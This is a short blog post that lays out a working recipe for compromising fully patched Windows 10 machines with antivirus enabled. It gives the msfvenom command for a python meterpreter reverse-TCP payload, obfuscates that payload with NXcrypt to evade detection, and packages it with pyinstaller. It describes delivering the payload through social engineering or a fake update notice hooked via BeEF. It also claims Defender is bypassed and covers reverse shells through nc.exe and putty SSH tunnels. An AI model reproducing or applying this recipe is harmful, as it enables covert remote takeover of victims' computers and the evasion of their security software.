top of page
Search

Latest Hacking News.....

Writer's picture: Wes BakerWes Baker

Sharing a little Windows 10 client side exploit today which we came across recently and replicated fully in a lab Machines: Windows 10 fully patched and Defender enabled + tests with Kaspersky, McAfee, Symantec, Avira and others.


1.) Create payload msfvenom --payload=python/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=YYYY --out=/var/www/html/evil.py


2.) "Encrypt" payload ./NXcrypt.py -f /var/www/html/evil.py -f /var/www/html/evil.py Puts a lot of random novel book texts in between :)


3.) Then either python to exe with pyinstaller Or smart script which installs python on victim machine (downloading, installing, taking care of the interactive prompts) and run script Deliver payload per social engineering / update notification once hooked in beef


4.) Multi Listener on server


5.) Meterpreter shell (only 16 out of 56 AV engines detect it). Windows defender is bypassed and doesn't detect anything. Windows defender also allows nc.exe to be downloaded and upgraded to meterpreter as well. Windows defender also allows putty to be downloaded and facilitate the reverse shell through an intermediary via SSH tunnel.



5 views0 comments

コメント


bottom of page